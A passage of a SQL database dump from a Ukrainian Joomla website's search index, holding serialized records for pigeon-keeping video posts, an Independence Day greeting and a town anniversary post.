00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4930,'index.php?option=com_content&view=article&id=2531','index.php?option=com_content&view=article&id=2531:zaryadka-pered-snidankom&catid=126','Зарядка перед сніданком',' ','2021-08-22 11:55:58','6db99799dbcb88bf3154a61821d69e78',1,1,1,'*','2021-08-22 08:55:58','0000-00-00 00:00:00','2021-08-22 08:55:58','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2531\";s:5:\"alias\";s:24:\"zaryadka-pered-snidankom\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/RPoxCVoxFyo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-08-22 08:55:58\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:29:\"2531:zaryadka-pered-snidankom\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:46:\"/holuby/poshtovi/2531-zaryadka-pered-snidankom\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2531\";s:5:\"route\";s:84:\"index.php?option=com_content&view=article&id=2531:zaryadka-pered-snidankom&catid=126\";s:5:\"title\";s:44:\"Зарядка перед сніданком\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-08-22 08:55:58\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-08-22 08:55:58\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4931,'index.php?option=com_content&view=article&id=2532','index.php?option=com_content&view=article&id=2532:snidanok-poshtovikh-golubiv&catid=126','Сніданок поштових голубів',' ','2021-08-22 11:57:40','1845daba997501031a6b58d343b18b6d',1,1,1,'*','2021-08-22 08:57:40','0000-00-00 00:00:00','2021-08-22 08:57:40','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2532\";s:5:\"alias\";s:27:\"snidanok-poshtovikh-golubiv\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/gI8OSRz-VEg\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-08-22 08:57:40\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:32:\"2532:snidanok-poshtovikh-golubiv\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:49:\"/holuby/poshtovi/2532-snidanok-poshtovikh-golubiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2532\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=2532:snidanok-poshtovikh-golubiv&catid=126\";s:5:\"title\";s:48:\"Сніданок поштових голубів\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-08-22 08:57:40\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-08-22 08:57:40\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4934,'index.php?option=com_content&view=article&id=2533','index.php?option=com_content&view=article&id=2533:z-dnem-nezalezhnosti-ukrajini&catid=8','З Днем Незалежності України!',' Незалежність завжди починається з кожного з нас, наших вчинків, наших думок, наших рішень. ','2021-08-24 09:15:10','12e37fe8ab8a1f57aaebf854618a6f15',1,1,1,'*','2021-08-24 06:13:20','0000-00-00 00:00:00','2021-08-24 06:13:20','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2533\";s:5:\"alias\";s:29:\"z-dnem-nezalezhnosti-ukrajini\";s:7:\"summary\";s:872:\"<!--StartFragment--><p style=\"text-align: center;\"><strong><em><span style=\"color: rgb(41, 105, 176); font-family: Georgia; font-size: 20px;\">Незалежність завжди починається з кожного з нас, наших вчинків, наших думок, наших рішень.</span></em></strong></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/240821.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/240821.jpg\" width=\"650\"></a><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/w_mtFAJjxVI\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-08-24 06:15:10\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:34:\"2533:z-dnem-nezalezhnosti-ukrajini\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:46:\"/8-novini-2/2533-z-dnem-nezalezhnosti-ukrajini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2533\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=2533:z-dnem-nezalezhnosti-ukrajini&catid=8\";s:5:\"title\";s:52:\"З Днем Незалежності України!\";s:11:\"description\";s:166:\" Незалежність завжди починається з кожного з нас, наших вчинків, наших думок, наших рішень. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-08-24 06:13:20\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-08-24 06:13:20\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4935,'index.php?option=com_content&view=article&id=2534','index.php?option=com_content&view=article&id=2534:malinu-1130-rokiv&catid=8','Малину - 1130 років',' ','2021-09-12 08:33:18','cb8ffcc18055e849b69dc667351e3265',1,1,1,'*','2021-09-12 05:33:18','0000-00-00 00:00:00','2021-09-12 05:33:18','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2534\";s:5:\"alias\";s:17:\"malinu-1130-rokiv\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/4Rngvn7-ss4\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-09-12 05:33:18\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\"